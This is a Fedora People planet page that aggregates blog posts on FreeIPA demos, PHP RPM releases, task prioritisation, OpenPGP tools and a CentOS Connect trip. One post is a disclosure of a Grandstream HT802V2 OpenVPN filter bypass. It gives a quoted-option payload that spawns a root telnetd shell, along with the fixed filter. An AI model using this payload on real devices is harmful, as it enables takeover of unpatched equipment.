
Fedora People

FreeIPA local tests and FOSDEM demos

Posted by Alexander Bokovoy on 2025-02-14 11:15:00 UTC

FOSDEM 2025 is behind us. We ran the Identity and Access Management devroom at FOSDEM. At the devroom, my team did a few talks and demos about FreeIPA and Kerberos. While preparing for those talks, we tried to create demonstrations that could be repeated by others as well. First, this was an attempt to help ourselves, as we need to communicate our advances to others in the teams. Then we started to look at how to show our progress to folks outside of the development groups.

We iterated over our tools and finally ended up with something that is based on what we use in upstream CIs: we use podman containers to run what ends up being ephemeral VMs hosting the software. This doesn’t give the ability to handle all possible scenarios. It is not a way to run actual production environments either. Yet, it allows us to quickly reuse and share:

  • descriptive definition of the deployment configuration

  • standard tooling to provision the configuration as containers with podman-compose

  • use of Ansible playbooks to run repeatable actions against the hosts, with inventory taken from the podman-compose integration

The tool, ipalab-config, quickly became flexible enough to be used in multiple scenarios. It powers ansible-freeipa’s own upstream CI, we aim to reuse it for new FreeIPA Web UI development and for the FreeIPA workshop.

For the demos at the FOSDEM IAM devroom we put together a separate repository that has all the scenarios and even recording files to reproduce the demos: freeipa-local-tests. You can try for yourself how the local authentication hub, IPA-IPA trust, or IPA-IPA migration work.

This project demonstrates how complex multi-system FreeIPA deployments can be tested locally or in your CI/CD. The test environment is built with the help of podman and orchestrated with the ipalab-config and podman-compose tools. The FreeIPA environment is deployed with the help of ansible-freeipa. Upstream, we run these tests in GitHub Actions as well.

Demo labs

The following configurations are provided as ‘labs’ that can be reproduced using the ipalab-config tool and the configurations from this project:

Demo recordings

Some of the demo labs have automated recording of the operations that could be performed on them. Video recording is built upon the excellent VHS tool. A pre-built version for Fedora is provided in COPR abbra/vhs. This build also includes a fix from the upstream PR#551.

Minimal deployment demo

This demo recording includes a minimal use of FreeIPA command line:

  • an administrator logs into a client system over SSH using a password
  • Kerberos ticket is obtained automatically by the SSSD
  • IPA command line tool can authenticate to IPA server using Kerberos

Local KDC demo

The local KDC demo is more evolved:

  • a user logs into their own machine over SSH using a password
  • Kerberos ticket is obtained automatically by the SSSD from the local KDC which is activated on demand
  • User then uses a Kerberos ticket to authenticate to SUDO and obtain root privileges
  • The user also uses the Kerberos ticket to authenticate to Samba server running locally
  • Finally, the user authenticates with Kerberos IAKerb extension to a remotely running Samba server, removing completely a need for NTLM authentication protocol

IPA to IPA trust demo

This is a minimalistic demo of how users and groups from one IPA environment can be resolved in the other IPA environment. There is a trust agreement established between both IPA environments, similarly to how IPA can establish a forest level trust with Active Directory.

Infra and RelEng Update – Week 07 2025

Posted by Fedora Community Blog on 2025-02-14 10:00:00 UTC

This is a weekly report from the I&R (Infrastructure & Release Engineering) Team. We provide you with both an infographic and a text version of the weekly report. If you just want to quickly look at what we did, just look at the infographic. If you are interested in more in-depth details, look below the infographic.

Week: 10th Feb – 14th Feb 2025

Infrastructure & Release Engineering

The purpose of this team is to take care of day to day business regarding CentOS and Fedora Infrastructure and Fedora release engineering work.
It’s responsible for services running in Fedora and CentOS infrastructure and preparing things for the new Fedora release (mirrors, mass branching, new namespaces etc.).
List of planned/in-progress issues

Fedora Infra

CentOS Infra including CentOS CI

Release Engineering

If you have any questions or feedback, please respond to this report or contact us on #redhat-cpe channel on matrix.

The post Infra and RelEng Update – Week 07 2025 appeared first on Fedora Community Blog.

⚙️ PHP version 8.3.16 and 8.4.3

Posted by Remi Collet on 2025-01-17 05:51:00 UTC

RPMs of PHP version 8.4.3 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

RPMs of PHP version 8.3.16 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

ℹ️ The packages are available for x86_64 and aarch64.

ℹ️ There is no security fix this month, so no update for version 8.1.31 and version 8.2.27.

⚠️ PHP version 8.0 has reached its end of life and is no longer maintained by the PHP project.

These versions are also available as Software Collections in the remi-safe repository.

Version announcements:

ℹ️ Installation: use the Configuration Wizard and choose your version and installation mode.

Replacement of default PHP by version 8.4 installation (simplest):

dnf module switch-to php:remi-8.4/common

Parallel installation of version 8.4 as Software Collection

yum install php84

Replacement of default PHP by version 8.3 installation (simplest):

dnf module switch-to php:remi-8.3/common

Parallel installation of version 8.3 as Software Collection

yum install php83

And soon in the official updates:

⚠️ To be noticed :

  • EL-10 RPMs are built using RHEL-10.0-beta
  • EL-9 RPMs are built using RHEL-9.5
  • EL-8 RPMs are built using RHEL-8.10
  • intl extension now uses libicu74 (version 74.2)
  • mbstring extension (EL builds) now uses oniguruma5php (version 6.9.10, instead of the outdated system library)
  • oci8 extension now uses the RPM of Oracle Instant Client version 23.6 on x86_64, 19.25 on aarch64
  • a lot of extensions are also available, see the PHP extensions RPM status (from PECL and other sources) page

ℹ️ Information:

Base packages (php)

Software Collections (php81 / php82 / php83)

⚙️ PHP version 8.3.17 and 8.4.4

Posted by Remi Collet on 2025-02-14 06:59:00 UTC

RPMs of PHP version 8.4.4 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

RPMs of PHP version 8.3.17 are available in the remi-modular repository for Fedora ≥ 39 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

ℹ️ The packages are available for x86_64 and aarch64.

ℹ️ There is no security fix this month, so no update for version 8.1.31 and version 8.2.27.

⚠️ PHP version 8.0 has reached its end of life and is no longer maintained by the PHP project.

These versions are also available as Software Collections in the remi-safe repository.

Version announcements:

ℹ️ Installation: use the Configuration Wizard and choose your version and installation mode.

Replacement of default PHP by version 8.4 installation (simplest):

dnf module switch-to php:remi-8.4/common

Parallel installation of version 8.4 as Software Collection

yum install php84

Replacement of default PHP by version 8.3 installation (simplest):

dnf module switch-to php:remi-8.3/common

Parallel installation of version 8.3 as Software Collection

yum install php83

And soon in the official updates:

⚠️ To be noticed :

  • EL-10 RPMs are built using RHEL-10.0-beta
  • EL-9 RPMs are built using RHEL-9.5
  • EL-8 RPMs are built using RHEL-8.10
  • intl extension now uses libicu74 (version 74.2)
  • mbstring extension (EL builds) now uses oniguruma5php (version 6.9.10, instead of the outdated system library)
  • oci8 extension now uses the RPM of Oracle Instant Client version 23.7 on x86_64, 19.25 on aarch64
  • a lot of extensions are also available, see the PHP extensions RPM status (from PECL and other sources) page

ℹ️ Information:

Base packages (php)

Software Collections (php83 / php84)

What hardware, software, and cloud services do we use?

Posted by Vedran Miletić on 2025-02-14 06:28:12 UTC


Photo source: Patrik Kernstock (@pkernstock) | Unsplash


Our everyday scientific and educational work relies heavily on hardware, software, and, in modern times, cloud services. The equipment that we will mention below is specific to our group; common services used by university and/or faculty employees will not be specifically mentioned here.

Publishing (Material for) MkDocs website to GitHub Pages using custom Actions workflow

Posted by Vedran Miletić on 2025-02-14 06:28:12 UTC


Photo source: Roman Synkevych (@synkevych) | Unsplash


As you can probably see, this website is built using the Material theme for MkDocs, which we have been happily using for over one year after using Sphinx for many years prior to that. GitHub Pages offers built-in support for Jekyll, but not for MkDocs and therefore it requires the manual building and deployment of our website. However, it automates many other things, including HTTPS certificate provisioning on our domain via Let's Encrypt.

There are several somewhat related approaches using GitHub Actions for automating the deployment of MkDocs-generated sites, usually with the Material theme, to GitHub Pages. These guides are not only found on blogs written by enthusiasts; the official Getting started section of the Material for MkDocs documentation describes the usage of GitHub Actions for deployment and provides a generic YAML file for that purpose.

The 46th International TeX Users Group Conference, 2025

Posted by Rajeesh KV on 2025-02-13 09:12:49 UTC

The 46th annual meeting of the International TeX Users Group (TUG 2025) will take place in Thiruvananthapuram (aka Trivandrum), Kerala, India, on 18–20 July, 2025. The Indian TeX Users Group and TeXFolio (STMDocs) with support from International TeX Users Group and sponsors are organizing the event this time as it comes back to India after a long hiatus of 14 years (the last two instances hosted were in 2011 and 2002).

Details about the registration, venue, travel, accommodation, programme, deadlines and important dates etc. are available at the conference page https://tug.org/tug2025/.

Call for participation

TUG conferences always enjoyed excellent presentations and talks about TeX, Typefaces/Fonts, Typesetting, Typography and anything related. Please submit interesting papers — see call for papers and speaker advice. Note that a visa is required for participants from most countries and it is a non-trivial undertaking. Please register and contact the program committee for a visa invitation letter as soon as possible.

The drawings for TUG 2025 are made by notable cartoonist E.P. Unny and the flyer is typeset by CVR.

Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

Posted by Evgeni Golov on 2025-02-12 16:58:46 UTC

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.

Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did

echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}

After the fix it does

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}

That means it deletes all lines that either contain script-security or start with a set of options that allow command execution.

Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary.

Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened.

The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names too.

That means that instead of

up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

from the original exploit by Tenable, we write

"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:

# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

And with that, once the OpenVPN connection is established, a reverse shell is spawned:

/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux

/ # id
uid=0(root) gid=0(root)

Affected devices

  • HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
  • Most probably also other HT8xxV2, as they use the same firmware
  • Most probably also HT8xx(V1), as their /etc/rc.d/init.d/openvpn looks very similar, according to firmware dumps

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
                         | sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}

So far I was unable to inject any further commands in this block.
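
Added example (not code from the original post or from Grandstream's firmware): a Python regression check that ports the two sed filters quoted above and then inspects what survives by the parsed option name instead of the raw line text. `shlex` is used as a simplified stand-in for OpenVPN's quote-aware tokenizer, and `/tmp/example.sh` and the sample lines are constructed.

```python
import re
import shlex

# Option names that the 1.0.3.10 filter quoted above tries to remove.
SCRIPT_OPTIONS = {
    "script-security", "down", "up", "learn-address", "tls-verify",
    "tls-crypt-v2-verify", "client-connect", "client-disconnect",
    "route-up", "route-pre-down", "auth-user-pass-verify", "ipchange",
}

# Python ports of the sed delete expressions run by firmware 1.0.3.5.
OLD_PATTERNS = [
    r"script-security", r"^[ ]*down ", r"^[ ]*up ", r"^[ ]*learn-address ",
    r"^[ ]*tls-verify ", r"^[ ]*client-[dis]*connect ", r"^[ ]*route-up",
    r"^[ ]*route-pre-down ", r"^[ ]*auth-user-pass-verify ", r"^[ ]*ipchange ",
]

# Character class used on both sides of the name in the 1.0.3.10 filter.
_Q = r"""["' \f\v\r\n\t]"""
_NEW_NAMES = [
    "down", "up", "learn-address", "tls-verify", "tls-crypt-v2-verify",
    "client-[dis]*connect", "route-up", "route-pre-down",
    "auth-user-pass-verify", "ipchange",
]
NEW_PATTERNS = [r"script-security"] + [f"^{_Q}*{n}{_Q}" for n in _NEW_NAMES]

UNPARSEABLE = "<unparseable>"


def sed_filter(raw, patterns):
    # Same two stages as the init script: split on ';', then drop every
    # line that matches one of the delete expressions.
    lines = raw.replace(";", "\n").split("\n")
    return [ln for ln in lines if not any(re.search(p, ln) for p in patterns)]


def option_name(line):
    # First token of the line after quote removal. Assumption: shlex is
    # only an approximation of how OpenVPN tokenizes a config line.
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    try:
        tokens = shlex.split(stripped)
    except ValueError:
        return UNPARSEABLE  # fail closed on unbalanced quotes
    return tokens[0] if tokens else None


def script_options_left(lines):
    # Names of script-executing (or unparseable) options still present.
    left = []
    for line in lines:
        name = option_name(line)
        if name == UNPARSEABLE or name in SCRIPT_OPTIONS:
            left.append(name)
    return left


def audit(raw):
    # What each firmware's filter would still write to the config file.
    return {
        "1.0.3.5": script_options_left(sed_filter(raw, OLD_PATTERNS)),
        "1.0.3.10": script_options_left(sed_filter(raw, NEW_PATTERNS)),
    }


# Constructed "Additional Options" values for the check.
SAMPLES = [
    "verb 3;up /tmp/example.sh",
    'verb 3;"up" /tmp/example.sh',
    "'down' /tmp/example.sh",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), audit(sample))
```

Checking the parsed name is what makes the test independent of how the option was spelled on the line, so it can be rerun unchanged against any later revision of the filter.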

Timeline

Prioritizing your work with the Eisenhower Matrix

Posted by Ben Cotton on 2025-02-12 13:58:35 UTC

I recently wrote about using the MoSCoW method for prioritizing work at the project level. But how do you prioritize your own individual work? The method that has worked best for me is known as the Eisenhower Matrix.

The Eisenhower Matrix explained

The Eisenhower Matrix requires making two binary choices about a task: is it of high or low importance and is it of high or low urgency? The prioritization then goes like this:

  1. High importance and high urgency. Do these first.
  2. High importance and low urgency. Schedule these.
  3. Low importance and high urgency. Delegate these.
  4. Low importance and low urgency. Don’t do these.

Sometimes you can delegate priority 3 tasks to others in the project, but often you can’t. Those either get done once you finish priority 1 or you end up not doing them. Not everything that’s urgent is important.

I prefer to think of category 4 as “do these when you have the time”, but you can’t do everything you think of, so category 4 is a good place to drop things if you have to. It’s okay to not do things.

Evaluating tasks

On its face, the Eisenhower Matrix is very simple. In practice, making the choices about importance and urgency causes a lot of hangups. They don’t need to. Make a quick judgement and refine as you go. The point is to avoid hyperfixating on the act of prioritization so you can get stuff done instead.

Importance

Importance, in particular, is a place where everyone struggles at first. Everything seems important, and there’s a degree of emotional vulnerability in calling some of your tasks “low importance.” It’s a short trip from there to thinking “all of my work is unimportant.”

But here’s the thing: it’s not called “unimportant”, it’s called “low importance.” Everything is relative, so it’s a matter of labeling the less important tasks in your total task universe. If it helps, think of it in terms of impacts down the line. If skipping a task creates a lot of additional work or a time crunch or prevents a key thing from happening on time, that task has high importance. If skipping a task is manageably inconvenient, then it’s of low importance.

For example, as I was thinking about this section, I realized that some of my regular tasks are less important than I labeled them. Posting a reminder about the weekly project maintainer meeting has some importance, but the people who need to be there already have it on their calendar. If I forget one week and other community members don’t join, that’s not ideal, but there’s no real harm. The meetings are recorded anyway. I’ve been using the Eisenhower Matrix for years and I still tend to bias toward high importance.

Urgency

Urgency tends to be easier to manage. We know that some things can wait. Still, it’s sometimes difficult to decide how urgent is urgent. One good rule is this: if there’s an actual deadline looming, the task is urgent. If you’d just like to have it done, it’s not urgent. The looming deadline part is perhaps the trickiest. If a conference’s call for proposals closes in a month, writing your proposal is probably not an urgent task. If it closes at the end of the day, then writing your proposal is urgent. But what if it’s at the end of the week? Or in two weeks? That can be harder to judge.

The thing to remember is that task evaluations are not static. As deadlines approach, tasks can go from low urgency to high urgency. If you complete all of your high importance tasks and no new ones appear, then some of your low importance tasks become high importance relative to what’s left.

Limitations of the Eisenhower Matrix

Like any framework, the Eisenhower Matrix isn’t perfect. It is for making daily decisions on how to prioritize tasks, not to provide one true understanding of the importance and urgency of everything in your life. Its power and weakness are in its simplicity.

One thing that the Eisenhower Matrix ignores is the time necessary to complete a task. One high importance, high urgency task might take all day (though maybe you should decompose it into smaller tasks). Would accomplishing 10 shorter tasks of lower individual importance or urgency have a greater impact in aggregate? Maybe. The Eisenhower Matrix doesn’t tell you what to do if your priority 1 tasks require more than your entire day. Then again, maybe that’s a sign that you’ve over-importanced some tasks.

How do you decide which of several tasks within a priority category to do first? The Eisenhower Matrix doesn’t say. You can just pick one. If you feel the need to rank them, the refining criteria in the MoSCoW post can help. The main point is that you don’t need to recursively evaluate each task until you have a strictly ordered list. That wastes time that you could be spending doing the actual work.

The Eisenhower Matrix also fails to account for how draining or fun a task is. All tasks give the joy of dopamine when you mark them done, but some are actually fun to complete and others are dreadful. I, for example, enjoy posting the recordings and notes from meetings but dread making phone calls. You won’t go to jail for not following your prioritized list exactly, though. If you need some joyful tasks to get you through the drudgery, you can make that choice.

This post’s featured photo by Thomas Bormans on Unsplash.

The post Prioritizing your work with the Eisenhower Matrix appeared first on Duck Alignment Academy.

🎲 PHP version 8.3.17RC1 and 8.4.4RC2

Posted by Remi Collet on 2025-01-31 06:35:00 UTC

Release Candidate versions are available in the testing repository for Fedora and Enterprise Linux (RHEL / CentOS / Alma / Rocky and other clones) to allow more people to test them. They are available as Software Collections, for a parallel installation, the perfect solution for such tests, and also as base packages.

RPMs of PHP version 8.4.4RC2 are available

  • as base packages in the remi-modular-test for Fedora 39-41 and Enterprise Linux ≥ 8
  • as SCL in remi-test repository

RPMs of PHP version 8.3.17RC1 are available

  • as base packages in the remi-modular-test for Fedora 39-41 and Enterprise Linux ≥ 8
  • as SCL in remi-test repository

ℹ️ The packages are available for x86_64 and aarch64.

ℹ️ PHP version 8.2 is now in security mode only, so no more RC will be released.

ℹ️ Installation: follow the wizard instructions.

ℹ️ Announcements:

Parallel installation of version 8.4 as Software Collection:

yum --enablerepo=remi-test install php84

Parallel installation of version 8.3 as Software Collection:

yum --enablerepo=remi-test install php83

Update of system version 8.4:

dnf module switch-to php:remi-8.4
dnf --enablerepo=remi-modular-test update php\*

Update of system version 8.3:

dnf module switch-to php:remi-8.3
dnf --enablerepo=remi-modular-test update php\*

ℹ️ Notice:

  • version 8.4.4RC2 is in Fedora rawhide for QA
  • EL-10 packages are built using RHEL-10.0-beta
  • EL-9 packages are built using RHEL-9.5
  • EL-8 packages are built using RHEL-8.10
  • oci8 extension uses the RPM of the Oracle Instant Client version 23.7 on x86_64 or 19.25 on aarch64
  • intl extension uses libicu 74.2
  • RC version is usually the same as the final version (no change accepted after RC, exception for security fix).
  • versions 8.3.17 and 8.4.4 are planned for February 13th, in 2 weeks.

Software Collections (php83, php84)

Base packages (php)

pass using stateless OpenPGP command line interface

Posted by Kushal Das on 2025-02-12 05:26:13 UTC

Yesterday I wrote about how I am using a different tool for git signing and verification. Next, I replaced my pass usage. I have a small patch to use stateless OpenPGP command line interface (SOP). It is an implementation agnostic standard for handling OpenPGP messages. You can read the whole SPEC here.

Installation

cargo install rsop rsop-oct

And copied the bash script from my repository to the path somewhere.

The rsoct binary from rsop-oct follows the same SOP standard but uses the card for signing/decryption. I stored my public key in ~/.password-store/.gpg-key file, which is in turn used for encryption.

Usage

Here nothing changed related to my daily pass usage, except the number of times I am typing my PIN :)

Day Two - CentOS Connect 2025

Posted by Akashdeep Dhar on 2025-02-11 18:30:00 UTC

I should not have stayed up late the previous night - This thought crossed my mind when I heard the alarm go off at around 0500am Central European Time on the second day of CentOS Connect 2025. On 31st January 2025, we had a bunch of talks planned since the morning and I did not want to miss out on a collection that I had planned on attending. I checked with Greg Sutcliffe who was in the dining area already so while I could have used some more rest, I decided to head down after getting freshened up. After going through my documentation to check the estimated action and projected estimate, I headed down for breakfast. I followed up with Amita Sharma's request to confirm some important details about the Fedora Project's presence during DevConf.IN 2025 while sticking to a light meal.

CentOS Connect 2025 info shown on the digital signage devices present in the DoubleTree by Hilton Brussels City hotel

At around 0700am Central European Time, Sumantro Mukherjee arrived at the dining area right around the time Greg and I were about to leave and he decided to join us a bit later in the day. Heading down to track number #2 of the Port De Namur station, Greg purchased a collection of tickets for the train ride while I decided to rely on my credit card for the expenses. Funnily enough, we had the exit unblocked at the Rogier station - which was super helpful for a confused Greg who ended up keeping the ticket that we used back in the collection he had. On our way to the DoubleTree by Hilton Brussels City, Greg remarked how happy he was after joining the Red Hat Community Linux Engineering team in a technical role after his stint in the community management role in the Red Hat Ansible community.

From left to right - Fabian and I exchanging snacks and wishes in the CentOS Connect 2025 event cloakroom

While it was cloudy on that day - the two of us were glad that the rain had paused for a brief period of time in the morning. We made it to the CentOS Connect 2025 reception desk to find Amy Marrich and Dorka Volavkova in the empty venue. We were soon joined by Michel Lind there with whom I caught up with conversations while Greg was getting himself registered for the event. As he was attending the CHAOSScon EU 2025 event the day before, this was the first day of attendance for him here. I also met up with Fabian Arrotin with whom I shared some Indian snacks, namely Chakli, before wishing him luck for the first talk that he had on that day. At around 0900am Central European Time, I dropped off my bags in the cloakroom and left to attend the talk on CentOS Infra SIG Review And Updates.

I shared conversations with Neal Gompa, Mike McLean, and Sherif Nagy in the event corridor before finding a seat beside Michel in the Chestnut Hall. This talk was followed by the presentation on the CentOS Hyperscale SIG Update by Davide Cavalca and Neal at around 0945am Central European Time. I stayed back for the talk on CentOS Alternate Images SIG Update presentation by Troy Dawson at around 1015am Central European Time before heading out into the event corridor again. I met up with Sumantro who had arrived at the event venue by then and Julia Bley, who was giving a tour to her partner, Olaf Bley-Steglich, who was visiting a technical conference for the first time. His innocent inquisitiveness about how Red Hat does business around free and open source felt endearing to me.

Julia providing Sumantro and me with a quantitative analysis of why it is such a bad idea to plan for an event about three weeks before its commencement

At around 1130am Central European Time, I decided to bide my time working on my planning around the Fedora Project presence at DevConf.IN 2025 while I was anxiously waiting for Justin W. Flory to arrive at the event. In the meanwhile, I also had conversations with Dorka who mentioned her inability to help with the Fedora Project presence as she would be busy helping out with DevConf.IN 2025. Brian Profitt mentioned his presence during DevConf.IN 2025 and volunteered to help with the transit of the booth resources that we would need in Pune - a welcome gesture that I was very appreciative of. In the cloakroom, Julia, Sumantro and I discussed the feasibility of the Fedora Project presence during DevConf.IN 2025 and just how close we were cutting it to the actual event.

Greek Bowl with salmon salad would most definitely go down as one of the most fun snacks that I have had in any free and open source software conference so far

After a thorough discussion of the state of affairs, we kept ourselves open to the possibility of having to cancel the organization. Subjective to the budget that we might end up getting, I regarded that the event would be not worth organizing if we were not properly resourced for the same. While I provided Devang Parikh, Rajan Shah and Amita with a tentative nod, it was only after the discussion with Justin that I was able to move ahead. We kicked around for a while in the cloakroom with David Fan and Jess Chitas before heading over for lunch to the event corridor at around 0100pm Central European Time. While we were waiting for Justin's arrival, Sumantro and I shared our lunch consisting of a Greek Bowl with salmon salad while having conversations with Rich Bowen and Carl George.

From left to right - Myself and Daniel comparing who has it worse in terms of RPM packaging - Python SIG or Rust SIG (Courtesy. Luis Bazan CC-BY-SA 2.0)

I shared with Rich just how the Red Hat Community Platform Engineering team had changed since his departure from the team - covering stories from the renaming of the team and the merger of engineers with quality assurance. It was also interesting to know just how free and open source software communities were perceived and worked with from within the Amazon Web Services teams - where Rich was employed with then. At around 0130pm Central European Time, Justin had arrived at the event venue and we headed inside the cloakroom to have the discussion about the Fedora Project's presence during DevConf.IN 2025. The room seemed to be a lot more occupied than before but that did not stop me from swiftly getting him to speed about the situation and the requirements for the event.

From left to right - Jess, Julia, myself and Sumantro after wrapping up the discussions around the DevConf.IN 2025 event and heading for lunch

Given the limited period of time that we had before the DevConf.IN 2025 event, my primary resource of swags would have to be the leftovers from the Fedora Project booth at FOSDEM 2025. I was seeking funding for the travel and stay for Samyak Jain and Sumantro among other expenses like dining - the total estimated projection of which came around to be around 2000 USD. As the timing would have had it, all that Justin could reliably provide us with from Fedora Mindshare was barely 150 USD which would very clearly not be enough. While I was advised to keep the plan open to a minimal execution, I decided to reach out to Rajan and Devang with a declination notice for the Fedora Project booth as I promised them by the end of business on that day so that they could proceed ahead without us.

From left to right - Justin, Akashdeep and Sumantro after we figured that Justin's Red Hat is slightly bigger than the one I was provided with on joining Red Hat

After clearing the confusion around the ownership of the Fedora Project's presence during the event which was mistakenly considered to be Amita's instead of mine, we decided to start early from the next edition of DevConf.IN onwards. The only way with which we could avoid a disappointment like the one we just had would be to kick off the planning early during the next edition of DevConf.IN. With the notice being shared to the DevConf.IN 2025 organizer, Sumantro, Justin and I discussed the plans around the Fedora Project presence around the Asia Pacific region. We also considered pivoting away from our existing presence to other events that we did not previously consider like COSCUP and representing the Fedora Project community there instead for wider outreach and ambassadorship.

From left to right - Julia, Carl, Mike, myself, Fabian and Olaf sharing a photograph frame in the late afternoon right before Mike's talk on Building RPMs in Konflux

I decided to reach out to the folks from COSCUP at their booth presence during FOSDEM 2025 and we departed for the Chestnut Hall to Mike's talk on Building RPMs in Konflux at around 0400pm Central European Time. On my way to the presentation, I got in touch with Julia and Dorka about the cancellation of the Fedora Project's presence during DevConf.IN 2025. After a quick group photo with all the attendees, speakers and organizers at the event corridor, we headed inside to attend some of the last talks. Before I departed from the event at around 0530pm Central European Time, the event guests from the Red Hat Community Linux Engineering team gathered around for a quick set of photographs - before Sumantro and I headed over to the cloakroom of the event to fetch our belongings.

From left to right - Peter, Justin, myself and Sumantro sharing a photograph frame after Sumantro and I were pleased to meet Peter after a long time

While there was a waffle party planned by the CentOS Connect 2025 folks in Grand Place at 0830pm Central European Time, I thought of not attending that as I wanted to take care of the Fedora Project during the first day of FOSDEM 2025 early next morning. As we made it into the cloakroom, Sumantro and I were super pleasantly surprised to meet with Peter Boy with whom we were meeting after a long time. After clicking a couple of pictures with him and Justin with whom he was discussing details - the two of us decided to head back to the hotel. I decided not to attend the FLOSS Foundations dinner sponsored by Google as I did not have enough company from the Fedora Project and CentOS Project. Instead, I decided to rely on a takeaway for dinner like I did in the previous couple of days.

From left to right - Sumantro and I sharing a train ride back to the Port De Namur station and deciding to call it a day before FOSDEM 2025 fun begins on the next day

On our way back to the Moxy Brussels City Center hotel on train number #6, I decided to head out by myself to get my dinner as Sumantro was occupied with some work calls. Half of me wanted to wait for him but the other half of me was getting hungrier by the passing minute as I had a relatively lighter breakfast and lunch as I was anxious about the planning around the Fedora Project presence. After getting a Chicken Wrap back with some addons as my order was delayed from Belchicken, I ran into Mike Nolan at the hotel lobby with whom I had the pleasure of meeting after a long time. Through some conversations with Luis Bazan and Justin, I put out a bid for assistance with setting up the Fedora Project booth at FOSDEM 2025 before getting some rest to prepare for the lively next day!

Using openpgp-card-tool-git with git

Posted by Kushal Das on 2025-02-11 11:12:40 UTC

One of the powers of Unix systems comes from the various small tools and how they work together. One such new tool I have been using for some time is for git signing & verification using OpenPGP and my Yubikey for the actual signing operation via openpgp-card-tool-git. I replaced the standard gpg for this use case with the oct-git command from this project.

Installation & configuration

cargo install openpgp-card-tool-git

Then you will have to configure your git configuration (in my case, the global configuration).

git config --global gpg.program <path to oct-git>

I am assuming that you already had it configured before for signing, otherwise you have to run the following two commands too.

git config --global commit.gpgsign true
git config --global tag.gpgsign true

Usage

Before you start using it, you want to save the pin in your system keyring.

Use the following command.

oct-git --store-card-pin

That is it, now your git commit will sign the commits using the oct-git tool.

In the next blog post I will show how to use the other tools from the author for various different OpenPGP operations.
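
A quick way to confirm that the settings above took effect, written here as an added example (not code from the post or from the openpgp-card-tool-git project): the hypothetical helper audit_git_signing reads a git configuration file and reports anything that would leave commits or tags unsigned, or make git run a different signing program than the one intended.

```sh
# Added example. audit_git_signing is a hypothetical helper name.
# Usage: audit_git_signing ~/.gitconfig
# Prints one finding per line; returns 0 when there are none, 1 otherwise.
# The body runs in a subshell, so its variables do not leak to the caller.
audit_git_signing() (
    cfg=$1
    findings=0

    # gpg.program: which binary git runs for OpenPGP signing and verification.
    program=$(git config --file "$cfg" --get gpg.program || true)
    if [ -z "$program" ]; then
        echo "gpg.program is unset: git will run the default 'gpg', not oct-git"
        findings=$((findings + 1))
    elif [ "${program#/}" = "$program" ]; then
        # A bare name is looked up through PATH at signing time.
        echo "gpg.program '$program' is not an absolute path: resolved through PATH"
        findings=$((findings + 1))
    elif [ ! -x "$program" ]; then
        echo "gpg.program '$program' does not exist or is not executable"
        findings=$((findings + 1))
    fi

    # commit.gpgsign / tag.gpgsign: sign without having to pass -S or -s.
    for key in commit.gpgsign tag.gpgsign; do
        value=$(git config --file "$cfg" --type=bool --get "$key" || true)
        if [ "$value" != "true" ]; then
            echo "$key is not true: signing only happens when requested by hand"
            findings=$((findings + 1))
        fi
    done

    # gpg.program is only consulted for the openpgp format (the default).
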